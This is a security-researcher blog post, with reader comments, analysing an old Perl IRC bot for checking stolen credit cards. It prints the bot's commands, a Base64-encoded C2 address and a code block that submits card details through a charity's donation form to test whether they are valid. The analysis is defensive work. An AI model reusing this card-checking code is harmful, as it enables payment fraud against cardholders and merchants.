Yesterday, I got my hands on the source code of an IRC bot written in Perl. Yes, IRC ("Internet Relay Chat") is still alive! If the chat protocol is less used today to handle communications between malware and their C2 servers, it remains an easy way to interact with malicious bots that provide interesting services to attackers. I had a quick look at the source code (poorly written) and found some interesting information:
Example, unused configurations are stored in Base64 encoding like servers IP addresses: my $hostcri = "ODcuMjM2LjE5NC42OQ=="; $systemcri = MIME::Base64::decode($hostcri); // 87.236.194.69 Honestly, the bot was simply NOT working out of the box. I had to fix many issues in the code to have an "almost" working version. Of course, I did not test it on a public IRC server but deployed a quick lab based on Docker containers: Container 1 - the IRC server: $ docker run --rm --name ircserver -p 6667:6667 xena/elemental-ircd Container 2 - the bot: $ docker run —rm —name bot ubuntu:bot $ docker cp bot.pl bot:/tmp $ docker exec -it bot perl /tmp/bot.pl Note: I had to install many Perl libraries because the bot generated a lot of HTTP requests and uses specific modules for this purpose like WWW::Mechanize, WWW::Scripter or WWW::Selenium. I added some debugging code and fire the bot with a simple configuration to force it to connect to my local IRC server container. By default, the bot connects to a channel called “#deep” and presents itself with the nickname “[CRIMEB4NK]”: 21:43 [CRIMEB4NK] has joined (~walled@172.17.q.y) Let’s have a look at the commands defined in the bot: 21:43 Xme: !help 21:43 [CRIMEB4NK]: Type !cmd to get command list 21:43 Xme: !cmd 21:43 [CRIMEB4NK]: -= BOt Commands =- 21:43 [CRIMEB4NK]: info: Suported [VISA] [MasterCard] [Disco ver] [American Express] 21:43 [CRIMEB4NK]: !chk .......: <ccnumber> <expdate> <cvv> to check cvv2 21:43 [CRIMEB4NK]: !ip ........: <ip address> to get info about an IP 21:43 [CRIMEB4NK]: !zip .......: <zip code> to get city and state by zip In fact, the source code reveals more commands, here is the complete list:
As I said, the bot does not work anymore. The main function is broken (the CC validation) because the victim's page added a CAPTCHA code to prevent abuses (or they detected too much suspicious activity?) but it's interesting to see how they implemented the check. They found a foundation that accepts donations and they just simulate the donation of $1. Here is the block of code which performs the check: if($msg{'what'} =~ /^$chkcmd\s(\b[5436][0-9]{13,16}\b)\s(\d{4})\s(\b[0-9]{3,4}\b)/) { my ($numerocarta,$expmes,$verifica) = ($1,$2,$3); my $var1 = substr($expmes,0,2); my $var2 = substr($expmes,2,4); my $varType = 0; my $agent = WWW::Mechanize->new( autocheck => 1 ); my $formfiller = WWW::Mechanize::FormFiller->new(); $agent->env_proxy(); $agent->get('hxxps://jajf[.]org/donate/donate-form.cfm'); $agent->form_number(1) if $agent->forms and scalar @{$agent->forms}; $agent->form_number(1); { local $^W; $agent->current_form->value('firstname', 'mark'); }; { local $^W; $agent->current_form->value('lastname', 'smith'); }; # All the form fields are processed here... { local $^W; $agent->current_form->value('message', 'charity'); }; { local $^W; $agent->current_form->value('donationAmount', '1'); }; { local $^W; $agent->current_form->value('cardName', 'mark smith'); }; { local $^W; $agent->current_form->value('cardType', 'visa~Visa'); }; { local $^W; $agent->current_form->value('cardNumber', ''.$numerocarta.''); }; { local $^W; $agent->current_form->value('cardExpiration', ''.$var1.$var2.''); }; { local $^W; $agent->current_form->value('cardAuthCode', ''.$verifica.''); }; $agent->submit(); print $agent->content,"\n"; my $allo=$agent->content; open(FILE,">>chk13.html") or die "$!"; print FILE "$allo\n"; close FILE; my $allo=$agent->content; if ($allo =~/The transaction has been declined because of an AVS mismatch. The address provided does not match billing address of cardholder./){ }elsif ($allo =~/This transaction has been declined./){ # ... }elsif ($allo =~/The credit card number is invalid./){ # ... }elsif ($allo =~/The card code is invalid./){ # ... }elsif ($allo =~/The credit card has expired./){ # ... }elsif ($allo =~/The credit card expiration date entered is not valid./){ # ... }elsif ($allo =~//){ # ... }elsif ($allo =~/A duplicate transaction has been submitted./){ # ... }elsif ($allo =~/The credit card number entered is not valid./){ # ... }elsif ($allo =~/This transaction has been declined./){ # ... }elsif ($allo =~/Thanks to your important gift/){ } } To conclude, the bot was not working in its current state and looked quite old but it demonstrates that attackers are always developing tools to automate their actions. I did not find references on Google. I just found another version posted on the first of February with other IRC channel names. Xavier Mertens (@xme) |
Xme 697 Posts ISC Handler Mar 8th 2018 |
||||||||||||||
Thread locked Subscribe |
Mar 8th 2018 4 years ago |
||||||||||||||
how did you get the files?
I'm interested in the way the bots communicate with their servers, even irc is used less... |
L4rs 11 Posts |
||||||||||||||
Quote |
Mar 8th 2018 4 years ago |
||||||||||||||
Man irc , bitchx, efnet, and warez if only life were still so simple
|
jACKtheRipper 67 Posts |
||||||||||||||
Quote |
Mar 10th 2018 4 years ago |
||||||||||||||
Can you please provide more details on how the file can be downloaded?
Maybe a short tutorial would be of great help. Thanks Michael https://mp3itnow.com |
Anonymous |
||||||||||||||
Quote |
Mar 11th 2018 4 years ago |
||||||||||||||
In this case, the file was found via my pastebin scrapper...
|
Xme 697 Posts ISC Handler |
||||||||||||||
Quote |
Mar 12th 2018 4 years ago |
Sign Up for Free or Log In to start participating in the conversation!